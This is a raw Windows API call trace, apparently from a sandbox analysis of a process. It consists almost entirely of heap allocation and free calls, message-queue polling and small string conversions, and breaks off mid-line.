[0195.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0195.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0195.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0195.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0195.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0195.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0195.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0195.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0195.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0195.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0195.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0195.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0195.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0195.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0195.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0195.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0195.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0195.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0195.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0195.254] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0195.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0195.254] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0195.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0195.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0195.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0195.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0195.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0195.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0195.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0195.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0195.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0195.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0195.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0195.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0195.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0195.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0195.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0195.255] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0195.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0195.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0195.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0195.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0195.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0195.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0195.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0195.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0195.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0195.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0195.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0195.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0195.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x3) returned 0x24b10b8 [0195.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0195.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0195.256] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0195.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0195.256] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x24b1c18, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0195.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0195.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0195.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0195.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0195.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0195.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0195.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0195.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0195.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0195.257] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0195.257] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0195.257] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0195.257] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0195.257] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0195.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0195.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0195.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0195.257] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0195.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0195.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0195.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0195.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0195.257] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466dd0 [0195.257] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0195.257] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0195.257] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0195.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0195.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0195.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0195.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0195.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0195.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0195.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0195.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0195.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0195.258] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0195.258] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0195.258] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0195.258] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0195.258] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0195.258] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0195.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0195.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x3) returned 0x24b1748 [0195.258] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0195.258] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0195.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0195.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0195.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0195.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0195.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0195.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0195.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0195.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0195.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0195.259] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0195.259] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0195.259] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0195.259] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0195.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0195.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0195.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f170 | out: hHeap=0x25c0000) returned 1 [0195.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0195.259] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0195.259] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0195.259] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0195.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0195.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466dd0 [0195.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0195.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0195.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0195.260] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0195.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0195.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0195.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0195.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0195.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0195.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0195.260] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0195.260] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0195.260] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0195.260] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0195.260] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0195.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0195.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0195.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0195.261] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0195.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x3) returned 0x24b16c8 [0195.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0195.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0195.261] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0195.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0195.261] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x24b1c18, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0195.261] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0195.261] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0195.261] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0195.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0195.261] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0195.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0195.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x3) returned 0x24b1c18 [0195.261] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0195.261] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0195.261] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f170 | out: hHeap=0x25c0000) returned 1 [0195.261] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0195.261] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0195.262] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0195.262] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0195.262] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0195.262] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0195.262] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0195.262] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0195.262] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0195.262] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0195.262] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0195.262] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0195.262] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0195.262] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0195.262] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0195.262] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0195.262] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0195.262] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0195.262] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0195.262] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0195.263] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0195.263] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0195.263] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0195.263] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0195.263] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0195.263] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0195.263] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0195.263] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0195.263] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0195.263] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0195.263] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0195.263] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0195.263] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0195.263] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0195.263] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0195.263] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0195.263] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0195.263] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0195.264] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0195.264] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0195.264] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0195.264] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0195.264] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0195.264] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0195.264] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0195.264] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0195.264] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0195.264] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1a0 | out: hHeap=0x25c0000) returned 1 [0195.264] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0195.264] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0195.264] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0195.264] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0195.264] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0195.264] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0195.265] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0195.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0195.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0195.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0195.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0195.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0195.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0195.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0195.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0195.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0195.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0195.265] HeapFree (in: hHeap=0x25c0000, 